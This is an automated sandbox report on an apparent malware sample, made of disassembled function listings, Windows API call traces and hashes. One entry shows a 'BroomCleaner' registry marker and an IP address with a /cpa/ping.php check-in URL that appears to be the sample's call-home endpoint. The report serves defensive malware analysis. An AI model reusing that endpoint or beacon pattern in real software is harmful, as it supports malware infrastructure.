                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1558244577.0000000004320000.00000040.00001000.00020000.00000000.sdmp, Offset: 04320000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_4320000_zLwT7vCojz.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 26e97803392628a66f226ceeca960576ab6ae59f7b73d64c31b09e82fec4626e
                                                                                                                                                                                                                                              • Instruction ID: cda375fd3f1557f7950aedce61f0b08754718638b3ffe0fae8e89dd40b311bc0
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 26e97803392628a66f226ceeca960576ab6ae59f7b73d64c31b09e82fec4626e
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D1C1E6B1E04249EFEF11DFA8D880BADBBB4AF49316F085194E451AB391C7B0A941CF65
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 04336F80: GetLastError.KERNEL32(?,?,0432E697,?,?,?,0432ED94,?), ref: 04336F84
                                                                                                                                                                                                                                                • Part of subcall function 04336F80: _free.LIBCMT ref: 04336FB7
                                                                                                                                                                                                                                                • Part of subcall function 04336F80: SetLastError.KERNEL32(00000000), ref: 04336FF8
                                                                                                                                                                                                                                                • Part of subcall function 04336F80: _abort.LIBCMT ref: 04336FFE
                                                                                                                                                                                                                                              • _memcmp.LIBVCRUNTIME ref: 04334F5B
                                                                                                                                                                                                                                              • _free.LIBCMT ref: 04334FCC
                                                                                                                                                                                                                                              • _free.LIBCMT ref: 04334FE5
                                                                                                                                                                                                                                              • _free.LIBCMT ref: 04335017
                                                                                                                                                                                                                                              • _free.LIBCMT ref: 04335020
                                                                                                                                                                                                                                              • _free.LIBCMT ref: 0433502C
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1558244577.0000000004320000.00000040.00001000.00020000.00000000.sdmp, Offset: 04320000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_4320000_zLwT7vCojz.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: _free$ErrorLast$_abort_memcmp
                                                                                                                                                                                                                                              • String ID: C
                                                                                                                                                                                                                                              • API String ID: 1679612858-1037565863
                                                                                                                                                                                                                                              • Opcode ID: cb8600919e0bc0bfd4afc96a1d1b02341e3be43e8f324f1b28cbb9493ad17bb2
                                                                                                                                                                                                                                              • Instruction ID: 2f56492f379a3d4b9ca364e90a2dcf3935201dccf7f011af597d484a765537dc
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: cb8600919e0bc0bfd4afc96a1d1b02341e3be43e8f324f1b28cbb9493ad17bb2
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E3B14875A016199FEB24DF18C884AADB7B4FF58305F1445EAE949A7390E731BE90CF40
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 00416D19: GetLastError.KERNEL32(?,?,0040E430,?,?,?,0040EB2D,?), ref: 00416D1D
                                                                                                                                                                                                                                                • Part of subcall function 00416D19: _free.LIBCMT ref: 00416D50
                                                                                                                                                                                                                                                • Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D91
                                                                                                                                                                                                                                                • Part of subcall function 00416D19: _abort.LIBCMT ref: 00416D97
                                                                                                                                                                                                                                              • _memcmp.LIBVCRUNTIME ref: 00414CF4
                                                                                                                                                                                                                                              • _free.LIBCMT ref: 00414D65
                                                                                                                                                                                                                                              • _free.LIBCMT ref: 00414D7E
                                                                                                                                                                                                                                              • _free.LIBCMT ref: 00414DB0
                                                                                                                                                                                                                                              • _free.LIBCMT ref: 00414DB9
                                                                                                                                                                                                                                              • _free.LIBCMT ref: 00414DC5
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1555897451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1555897451.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_zLwT7vCojz.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: _free$ErrorLast$_abort_memcmp
                                                                                                                                                                                                                                              • String ID: C
                                                                                                                                                                                                                                              • API String ID: 1679612858-1037565863
                                                                                                                                                                                                                                              • Opcode ID: 867fa0ef6cc85311a84fab34ced728f8fa705af9a4dc30a667b1e83018fa5afb
                                                                                                                                                                                                                                              • Instruction ID: 4e3572d10ca72b0cc8c55f95b2e81b49ef67830968b65e4bef4c2f16e2eaf972
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 867fa0ef6cc85311a84fab34ced728f8fa705af9a4dc30a667b1e83018fa5afb
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 71B11875A012199BDB24DF18D884BEEB7B4FF88314F6045AAE809A7350E735AE91CF44
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,0040F850,0040F850,?,?,?,00416990,00000001,00000001,F5E85006), ref: 00416799
                                                                                                                                                                                                                                              • __alloca_probe_16.LIBCMT ref: 004167D1
                                                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00416990,00000001,00000001,F5E85006,?,?,?), ref: 0041681F
                                                                                                                                                                                                                                              • __alloca_probe_16.LIBCMT ref: 004168B6
                                                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,F5E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00416919
                                                                                                                                                                                                                                              • __freea.LIBCMT ref: 00416926
                                                                                                                                                                                                                                                • Part of subcall function 00417A45: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0041B4CD,00000000,?,00410DE7,?,00000008,?,00411992,?,?,?), ref: 00417A77
                                                                                                                                                                                                                                              • __freea.LIBCMT ref: 0041692F
                                                                                                                                                                                                                                              • __freea.LIBCMT ref: 00416954
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1555897451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1555897451.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_zLwT7vCojz.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3864826663-0
                                                                                                                                                                                                                                              • Opcode ID: b8827a1c079bf13245f6a2b5397cba4bf80c3eb245bf2fea745f98744adb5078
                                                                                                                                                                                                                                              • Instruction ID: 26764a85889f0707fbffed2f2a276afb84307330fa482a04e449b3980190c86e
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b8827a1c079bf13245f6a2b5397cba4bf80c3eb245bf2fea745f98744adb5078
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9C51D4B2610216ABDB259F65CC41EFF7BA9EF44754F16462EFD04D6280DB38DC80C6A8
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1558244577.0000000004320000.00000040.00001000.00020000.00000000.sdmp, Offset: 04320000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_4320000_zLwT7vCojz.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: _free
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 269201875-0
                                                                                                                                                                                                                                              • Opcode ID: 16879e562c41d271cc16cff151e7cbd4d44b0ffa200e9325e312bb0433d02818
                                                                                                                                                                                                                                              • Instruction ID: c7148852a9ae51168df7ffe4a57718d01e2e35aed11a9927de18e12eff135243
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 16879e562c41d271cc16cff151e7cbd4d44b0ffa200e9325e312bb0433d02818
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E461C275D00605EFEB20DFA8C841BAEBBF5EF48721F54516AE954EB241EB30BD418B90
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1555897451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1555897451.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_zLwT7vCojz.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: _free
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 269201875-0
                                                                                                                                                                                                                                              • Opcode ID: 7da7e4f938cfb7f53f4ee3042c9ba99eb24c12608d8937e14d039355d897170d
                                                                                                                                                                                                                                              • Instruction ID: 68ef0a4baed83bf313a212b59b327df333dc31b97233ae496646a1f671aa2022
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7da7e4f938cfb7f53f4ee3042c9ba99eb24c12608d8937e14d039355d897170d
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9A61B171900205AFDB20DF65C841BEABBF4EF48710F1441BBED44EB252E734AD868B98
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetConsoleCP.KERNEL32(?,?,?,?,?,?,?,?,?,043363EF,?,?,?,?,?,?), ref: 04335CBC
                                                                                                                                                                                                                                              • __fassign.LIBCMT ref: 04335D37
                                                                                                                                                                                                                                              • __fassign.LIBCMT ref: 04335D52
                                                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,?,00000005,00000000,00000000), ref: 04335D78
                                                                                                                                                                                                                                              • WriteFile.KERNEL32(?,?,00000000,043363EF,00000000,?,?,?,?,?,?,?,?,?,043363EF,?), ref: 04335D97
                                                                                                                                                                                                                                              • WriteFile.KERNEL32(?,?,00000001,043363EF,00000000,?,?,?,?,?,?,?,?,?,043363EF,?), ref: 04335DD0
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1558244577.0000000004320000.00000040.00001000.00020000.00000000.sdmp, Offset: 04320000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_4320000_zLwT7vCojz.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1324828854-0
                                                                                                                                                                                                                                              • Opcode ID: cb6d35f48d1bebdfaee63c5326d5eda48187afe5479d9753ca614cb5bfedeae6
                                                                                                                                                                                                                                              • Instruction ID: 89b8f29df8db3c387f8d1fac41e07d671758d54e52d140b7846e3c994cb933e7
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: cb6d35f48d1bebdfaee63c5326d5eda48187afe5479d9753ca614cb5bfedeae6
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5751E7B1A10245AFDB10CFA8D885BEEFBF4EF08301F15515AE951F7291D730A551CB64
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetConsoleCP.KERNEL32(?,?,?,?,?,?,?,?,?,00416188,?,?,?,?,?,?), ref: 00415A55
                                                                                                                                                                                                                                              • __fassign.LIBCMT ref: 00415AD0
                                                                                                                                                                                                                                              • __fassign.LIBCMT ref: 00415AEB
                                                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,?,00000005,00000000,00000000), ref: 00415B11
                                                                                                                                                                                                                                              • WriteFile.KERNEL32(?,?,00000000,00416188,00000000,?,?,?,?,?,?,?,?,?,00416188,?), ref: 00415B30
                                                                                                                                                                                                                                              • WriteFile.KERNEL32(?,?,00000001,00416188,00000000,?,?,?,?,?,?,?,?,?,00416188,?), ref: 00415B69
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1555897451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1555897451.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_zLwT7vCojz.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1324828854-0
                                                                                                                                                                                                                                              • Opcode ID: 0ae999e74c312fbf0247888fa3a2934b9317c3a2d6cc292263a5c2c0b7bdde97
                                                                                                                                                                                                                                              • Instruction ID: 97884a52693caeb5a5c3a9d5f4bc50bcec63f9a7d6aba0d10f38b6cf3ce1f43d
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0ae999e74c312fbf0247888fa3a2934b9317c3a2d6cc292263a5c2c0b7bdde97
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C051F1B1A05608DFDB10CFA8D881BEEBBF4EF49310F14416BE955E3291D774A981CB68
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • _ValidateLocalCookies.LIBCMT ref: 0040C7DB
                                                                                                                                                                                                                                              • ___except_validate_context_record.LIBVCRUNTIME ref: 0040C7E3
                                                                                                                                                                                                                                              • _ValidateLocalCookies.LIBCMT ref: 0040C871
                                                                                                                                                                                                                                              • __IsNonwritableInCurrentImage.LIBCMT ref: 0040C89C
                                                                                                                                                                                                                                              • _ValidateLocalCookies.LIBCMT ref: 0040C8F1
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1555897451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1555897451.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_zLwT7vCojz.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                                                              • String ID: csm
                                                                                                                                                                                                                                              • API String ID: 1170836740-1018135373
                                                                                                                                                                                                                                              • Opcode ID: 7022c009514565bc7e03d4d9ba72283da9068d18157a86314c5ddd6e7a3a15ef
                                                                                                                                                                                                                                              • Instruction ID: 4609d27efc8d7a17fa762f128460d8fd5adcc0840ed3b149ea1d44a8c589526f
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7022c009514565bc7e03d4d9ba72283da9068d18157a86314c5ddd6e7a3a15ef
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7F418235E00208DBCB10EF69C880A9EBBB5AF45315F14C27BE8156B3D1D7399945CB99
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • __EH_prolog.LIBCMT ref: 0432141C
                                                                                                                                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 0432142E
                                                                                                                                                                                                                                              • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0432146B
                                                                                                                                                                                                                                                • Part of subcall function 043280E1: _Yarn.LIBCPMT ref: 04328100
                                                                                                                                                                                                                                                • Part of subcall function 043280E1: _Yarn.LIBCPMT ref: 04328124
                                                                                                                                                                                                                                              • std::bad_exception::bad_exception.LIBCMT ref: 0432148C
                                                                                                                                                                                                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 0432149A
                                                                                                                                                                                                                                              • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 043214BD
                                                                                                                                                                                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 0432152E
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1558244577.0000000004320000.00000040.00001000.00020000.00000000.sdmp, Offset: 04320000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_4320000_zLwT7vCojz.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: std::_$Locinfo::_LockitYarn$Exception@8H_prologLocinfo_ctorLocinfo_dtorLockit::_Lockit::~_Throwstd::bad_exception::bad_exception
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 835844855-0
                                                                                                                                                                                                                                              • Opcode ID: 7b966b326459ba2342e1ffa8f210576540c6bcc155a50cbc91a1a0f115c5258d
                                                                                                                                                                                                                                              • Instruction ID: 359d1f29affcbd99c87b4118f425435e836212ec00854122d5a1c76318717948
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7b966b326459ba2342e1ffa8f210576540c6bcc155a50cbc91a1a0f115c5258d
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 20319072804B10DFD735AF29EA4065AFBF4FF48714B209A2FD09A92A50C774B501CF54
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • __EH_prolog.LIBCMT ref: 0434639B
                                                                                                                                                                                                                                              • RegCreateKeyExA.ADVAPI32(80000001,SOFTWARE\BroomCleaner,00000000,00000000,00000000,000F003F,00000000,?,00000000,Installed,0043CE50,SOFTWARE\BroomCleaner), ref: 043463C3
                                                                                                                                                                                                                                              • RegSetValueExA.ADVAPI32(?,?,00000000,00000001,?,?,0043CE50,0043CE51,Installed,Installed), ref: 04346446
                                                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,185.172.128.90,/cpa/ping.php?substr=%s&s=ab&sub=%s,?), ref: 04346467
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1558244577.0000000004320000.00000040.00001000.00020000.00000000.sdmp, Offset: 04320000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_4320000_zLwT7vCojz.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CloseCreateH_prologValue
                                                                                                                                                                                                                                              • String ID: Installed$SOFTWARE\BroomCleaner
                                                                                                                                                                                                                                              • API String ID: 1996196666-529226407
                                                                                                                                                                                                                                              • Opcode ID: 3ebed42bd8a8a97b6f395c5c0a06025ece7bda2f9691e063b130d2fba8ebffaa
                                                                                                                                                                                                                                              • Instruction ID: 2bfe8ff45cf63e5627ba9fa48e86e0d7dea26914b4d3f79326f42b0b6e1f63a0
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3ebed42bd8a8a97b6f395c5c0a06025ece7bda2f9691e063b130d2fba8ebffaa
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C2318971A00229AEEF148FA8CC909FEBB79FB49618F04516DE402B3251C7716D06CB60
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1555897451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1555897451.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_zLwT7vCojz.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: fc80b842ec2fa87e1f3d7b13bcdad74e1acd085aed55d4be6a2af7e8e8dba1d6
                                                                                                                                                                                                                                              • Instruction ID: eb3437e7256d6e9500263c5b78cb76159e7e032ed684a14598ba9abdd6a69119
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: fc80b842ec2fa87e1f3d7b13bcdad74e1acd085aed55d4be6a2af7e8e8dba1d6
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 85112BB27081297FDB202F739D04AAF3A5CDF85734B51022EBC15D6241DEBC88818669
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 0433F38A: _free.LIBCMT ref: 0433F3B3
                                                                                                                                                                                                                                              • _free.LIBCMT ref: 0433F691
                                                                                                                                                                                                                                                • Part of subcall function 04336501: HeapFree.KERNEL32(00000000,00000000,?,0433F3B8,?,00000000,?,00000000,?,0433F65C,?,00000007,?,?,0433FA50,?), ref: 04336517
                                                                                                                                                                                                                                                • Part of subcall function 04336501: GetLastError.KERNEL32(?,?,0433F3B8,?,00000000,?,00000000,?,0433F65C,?,00000007,?,?,0433FA50,?,?), ref: 04336529
                                                                                                                                                                                                                                              • _free.LIBCMT ref: 0433F69C
                                                                                                                                                                                                                                              • _free.LIBCMT ref: 0433F6A7
                                                                                                                                                                                                                                              • _free.LIBCMT ref: 0433F6FB
                                                                                                                                                                                                                                              • _free.LIBCMT ref: 0433F706
                                                                                                                                                                                                                                              • _free.LIBCMT ref: 0433F711
                                                                                                                                                                                                                                              • _free.LIBCMT ref: 0433F71C
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1558244577.0000000004320000.00000040.00001000.00020000.00000000.sdmp, Offset: 04320000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_4320000_zLwT7vCojz.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 776569668-0
                                                                                                                                                                                                                                              • Opcode ID: 6f5f9210e66ecb300b20def578b7e57a4e9d6a14b2db5b2a678dd4c5c189928c
                                                                                                                                                                                                                                              • Instruction ID: 26d7477240f5f064906e2b2dc43558c89f7122401a0ae2c4d8344595ec8fe116
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6f5f9210e66ecb300b20def578b7e57a4e9d6a14b2db5b2a678dd4c5c189928c
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 06112472940B04BAFE30B7B0CC46FCF7B9DAF08757F805825E69966050DA69F5084E51
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 0041F123: _free.LIBCMT ref: 0041F14C
                                                                                                                                                                                                                                              • _free.LIBCMT ref: 0041F42A
                                                                                                                                                                                                                                                • Part of subcall function 0041629A: RtlFreeHeap.NTDLL(00000000,00000000,?,0041F151,?,00000000,?,00000000,?,0041F3F5,?,00000007,?,?,0041F7E9,?), ref: 004162B0
                                                                                                                                                                                                                                                • Part of subcall function 0041629A: GetLastError.KERNEL32(?,?,0041F151,?,00000000,?,00000000,?,0041F3F5,?,00000007,?,?,0041F7E9,?,?), ref: 004162C2
                                                                                                                                                                                                                                              • _free.LIBCMT ref: 0041F435
                                                                                                                                                                                                                                              • _free.LIBCMT ref: 0041F440
                                                                                                                                                                                                                                              • _free.LIBCMT ref: 0041F494
                                                                                                                                                                                                                                              • _free.LIBCMT ref: 0041F49F
                                                                                                                                                                                                                                              • _free.LIBCMT ref: 0041F4AA
                                                                                                                                                                                                                                              • _free.LIBCMT ref: 0041F4B5
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1555897451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1555897451.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_zLwT7vCojz.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 776569668-0
                                                                                                                                                                                                                                              • Opcode ID: 6f5f9210e66ecb300b20def578b7e57a4e9d6a14b2db5b2a678dd4c5c189928c
                                                                                                                                                                                                                                              • Instruction ID: 6442e121d4515539895166ad143442a8d84c52f7901faf26133e6203624009ae
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6f5f9210e66ecb300b20def578b7e57a4e9d6a14b2db5b2a678dd4c5c189928c
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 79113D71540B14FADA20BBF2DC07FCB77DCAF4470CF40482EBA9A66052DA7DB9894654
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • __EH_prolog.LIBCMT ref: 0040418E
                                                                                                                                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 0040419D
                                                                                                                                                                                                                                              • int.LIBCPMT ref: 004041B4
                                                                                                                                                                                                                                                • Part of subcall function 00401318: std::_Lockit::_Lockit.LIBCPMT ref: 00401329
                                                                                                                                                                                                                                                • Part of subcall function 00401318: std::_Lockit::~_Lockit.LIBCPMT ref: 00401343
                                                                                                                                                                                                                                              • std::locale::_Getfacet.LIBCPMT ref: 004041BD
                                                                                                                                                                                                                                              • std::_Facet_Register.LIBCPMT ref: 004041EE
                                                                                                                                                                                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 00404204
                                                                                                                                                                                                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 0040422A
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1555897451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1555897451.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_zLwT7vCojz.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologRegisterThrowstd::locale::_
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1202896665-0
                                                                                                                                                                                                                                              • Opcode ID: d30c74e071694a417726272b0ad9aec889f249fd02ec2d8ca2e4928fce66191a
                                                                                                                                                                                                                                              • Instruction ID: 0d98e69d0512f29499375b1b223a36d4520ec3994eac90c636b6988e9ad91f04
